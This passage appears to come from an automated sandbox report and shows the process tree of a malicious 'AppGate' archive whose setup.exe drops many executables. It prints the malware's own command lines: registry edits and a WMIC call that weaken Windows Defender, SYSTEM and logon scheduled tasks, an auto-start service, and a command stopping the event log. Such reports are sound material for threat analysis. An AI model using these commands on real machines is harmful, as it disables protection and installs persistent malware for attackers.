of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 2860 4744 firefox.exe 82 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AppGate_3.rar1⤵
- Modifies registry class
PID:3652
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\AppGate_3.rar"2⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\AppGate_3.rar3⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.0.1336305927\531833653" -parentBuildID 20221007134813 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d77764f5-348d-4a93-81b5-8ce202cecee8} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 1808 1d41b2be758 gpu4⤵PID:828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.1.795100003\1184652286" -parentBuildID 20221007134813 -prefsHandle 2172 -prefMapHandle 2168 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b8d5c26-c8f0-4db6-bc74-c6549aef29bb} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 2184 1d41b1fb058 socket4⤵
- Checks processor information in registry
PID:4384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.2.1966030927\607220883" -childID 1 -isForBrowser -prefsHandle 2988 -prefMapHandle 2984 -prefsLen 21711 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dbf99a7-33b7-4403-8ef3-576c457f6ffb} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 2800 1d41b261b58 tab4⤵PID:2860
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.3.135230906\566766337" -childID 2 -isForBrowser -prefsHandle 3468 -prefMapHandle 3020 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8762a1f5-6f79-4157-a246-df9786f87864} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 2800 1d408f68858 tab4⤵PID:4276
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.4.2089941265\662267467" -childID 3 -isForBrowser -prefsHandle 4780 -prefMapHandle 4792 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6296ca16-12a3-4826-8b86-af9f61b3fafd} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 4452 1d41ca45658 tab4⤵PID:316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.5.1098159229\942351713" -childID 4 -isForBrowser -prefsHandle 4880 -prefMapHandle 4884 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fcace6f-5f1d-4998-98b7-ae3cfce52b64} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 4872 1d41ca45f58 tab4⤵PID:4756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.6.151771103\1159971769" -childID 5 -isForBrowser -prefsHandle 5104 -prefMapHandle 5108 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c70ff43-cee7-4e3e-87b4-e78c8fdf9885} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 5092 1d41ca46558 tab4⤵PID:3664
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.7.953017116\2115616721" -childID 6 -isForBrowser -prefsHandle 3104 -prefMapHandle 5628 -prefsLen 26543 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e47d019d-f622-49a6-82ae-7810b2d62c26} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 2588 1d41c430058 tab4⤵PID:4192
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.8.1899115369\427685265" -childID 7 -isForBrowser -prefsHandle 6004 -prefMapHandle 6000 -prefsLen 26543 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {367deeb0-9b40-45c2-975c-acc0284ec6fe} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 6012 1d4231f2c58 tab4⤵PID:168
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.9.548632171\2110983326" -childID 8 -isForBrowser -prefsHandle 4452 -prefMapHandle 4848 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {514c9e96-353a-4a71-9b6c-caf0f3ad2143} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 5116 1d41ca3a458 tab4⤵PID:3700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.10.283243853\885991145" -childID 9 -isForBrowser -prefsHandle 4220 -prefMapHandle 4952 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a08846a-f8cc-4feb-84f9-1f6a6b3065ec} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 4216 1d41dbb4558 tab4⤵PID:4956
-
-
C:\Users\Admin\Downloads\7z2406-x64.exe"C:\Users\Admin\Downloads\7z2406-x64.exe"4⤵
- Executes dropped EXE
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2708
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4424
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\AppGate_3.rar"1⤵PID:1524
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\AppGate_3.rar2⤵
- Checks processor information in registry
PID:2996
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\AppGate_3\" -spe -an -ai#7zMap22684:80:7zEvent294501⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4876
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4752
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\AppGate_3\" -spe -an -ai#7zMap7000:80:7zEvent124781⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2552
-
C:\Users\Admin\Downloads\AppGate_3\setup.exe"C:\Users\Admin\Downloads\AppGate_3\setup.exe"1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:4516 -
C:\Users\Admin\Documents\SimpleAdobe\YkFbnF18WKlD_PdMU7QNB4GR.exeC:\Users\Admin\Documents\SimpleAdobe\YkFbnF18WKlD_PdMU7QNB4GR.exe2⤵
- Executes dropped EXE
PID:2076
-
-
C:\Users\Admin\Documents\SimpleAdobe\PfM9di0SFCgdQu5zud76avXo.exeC:\Users\Admin\Documents\SimpleAdobe\PfM9di0SFCgdQu5zud76avXo.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2648 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1124
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:3436
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\3bqsaxgdhYyZV67bGKzFoGv2.exeC:\Users\Admin\Documents\SimpleAdobe\3bqsaxgdhYyZV67bGKzFoGv2.exe2⤵
- Executes dropped EXE
PID:756 -
C:\ProgramData\DGIJECGDGC.exe"C:\ProgramData\DGIJECGDGC.exe"3⤵PID:4120
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KKJKEBKFCAAE" & exit3⤵PID:3676
-
C:\Windows\SysWOW64\timeout.exetimeout /t 104⤵
- Delays execution with timeout.exe
PID:4944
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\SbOexcXltb2Agn2ru3rsEcbz.exeC:\Users\Admin\Documents\SimpleAdobe\SbOexcXltb2Agn2ru3rsEcbz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1588 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks processor information in registry
PID:4512 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ECAEGHIJEHJD" & exit4⤵PID:4264
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:4296
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\5dWOqDmgKaXGKYn8YSJ4kqBc.exeC:\Users\Admin\Documents\SimpleAdobe\5dWOqDmgKaXGKYn8YSJ4kqBc.exe2⤵
- Executes dropped EXE
PID:2288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 7643⤵
- Program crash
PID:68
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 8203⤵
- Program crash
PID:2640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 8443⤵
- Program crash
PID:4384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 8643⤵
- Program crash
PID:3652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 9723⤵
- Program crash
PID:1080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 11163⤵
- Program crash
PID:2184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 11523⤵
- Program crash
PID:2124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 11203⤵
- Program crash
PID:4540
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\_WP7kdOqbqZzzYP3lTi1fdVu.exeC:\Users\Admin\Documents\SimpleAdobe\_WP7kdOqbqZzzYP3lTi1fdVu.exe2⤵
- Executes dropped EXE
PID:3336 -
C:\Users\Admin\AppData\Local\Temp\is-6CP38.tmp\_WP7kdOqbqZzzYP3lTi1fdVu.tmp"C:\Users\Admin\AppData\Local\Temp\is-6CP38.tmp\_WP7kdOqbqZzzYP3lTi1fdVu.tmp" /SL5="$70288,4608415,54272,C:\Users\Admin\Documents\SimpleAdobe\_WP7kdOqbqZzzYP3lTi1fdVu.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4108 -
C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio.exe"C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio.exe" -i4⤵
- Executes dropped EXE
PID:4212
-
-
C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio.exe"C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio.exe" -s4⤵
- Executes dropped EXE
PID:1084
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\EujliRSqoNGxQSvgcZwYHM0a.exeC:\Users\Admin\Documents\SimpleAdobe\EujliRSqoNGxQSvgcZwYHM0a.exe2⤵
- Executes dropped EXE
PID:3324 -
C:\Users\Admin\AppData\Local\Temp\7zSBC28.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\7zSDA20.tmp\Install.exe.\Install.exe /QdidAa "525403" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:3544 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:4720
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:3924
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:4672
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:2172
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:1888
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:4372
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:4908
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:4740
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:4600
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:1872
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:2828
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:1680
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:3700
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:3020
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:2172
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
PID:2944 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:2996
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:2016
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:1760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:1068
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcicWGWSPuqTxjDSpV" /SC once /ST 10:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDA20.tmp\Install.exe\" Yw /GHldidqndK 525403 /S" /V1 /F5⤵
- Creates scheduled task(s)
PID:2996
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bcicWGWSPuqTxjDSpV"5⤵PID:2320
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bcicWGWSPuqTxjDSpV6⤵PID:352
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bcicWGWSPuqTxjDSpV7⤵PID:196
-
-
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\QsBxbMAfJNBQCdg_pg0H1RrR.exeC:\Users\Admin\Documents\SimpleAdobe\QsBxbMAfJNBQCdg_pg0H1RrR.exe2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:4596 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1584
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\UveIvkZy0meSnpmxZkeJYnaa.exeC:\Users\Admin\Documents\SimpleAdobe\UveIvkZy0meSnpmxZkeJYnaa.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1512 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5060
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\1v7DQzzvtFrGqTe3EOWskSNB.exeC:\Users\Admin\Documents\SimpleAdobe\1v7DQzzvtFrGqTe3EOWskSNB.exe2⤵
- Executes dropped EXE
PID:4876 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:3896
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:1376
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:4256
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:4588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RULTVSKP"3⤵
- Launches sc.exe
PID:1380
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"3⤵
- Launches sc.exe
PID:4880
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:3148
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RULTVSKP"3⤵
- Launches sc.exe
PID:1372
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\03CZokS0HonJoqM4c6Xg0U7K.exeC:\Users\Admin\Documents\SimpleAdobe\03CZokS0HonJoqM4c6Xg0U7K.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4276 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\f6McHUkv64D7xAPSGsYLgwj6.exeC:\Users\Admin\Documents\SimpleAdobe\f6McHUkv64D7xAPSGsYLgwj6.exe2⤵
- Executes dropped EXE
PID:1380 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "3⤵PID:2684
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\world.exeworld.exe -priverdD4⤵
- Executes dropped EXE
PID:1820 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\moigsaw.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\moigsaw.exe"5⤵
- Executes dropped EXE
PID:4624
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\A83BCcdrPH0IdZ2cpT2yeQ_I.exeC:\Users\Admin\Documents\SimpleAdobe\A83BCcdrPH0IdZ2cpT2yeQ_I.exe2⤵
- Executes dropped EXE
PID:3344
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5100
-
C:\Users\Admin\AppData\Local\Temp\7zSDA20.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSDA20.tmp\Install.exe Yw /GHldidqndK 525403 /S1⤵PID:2508
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C 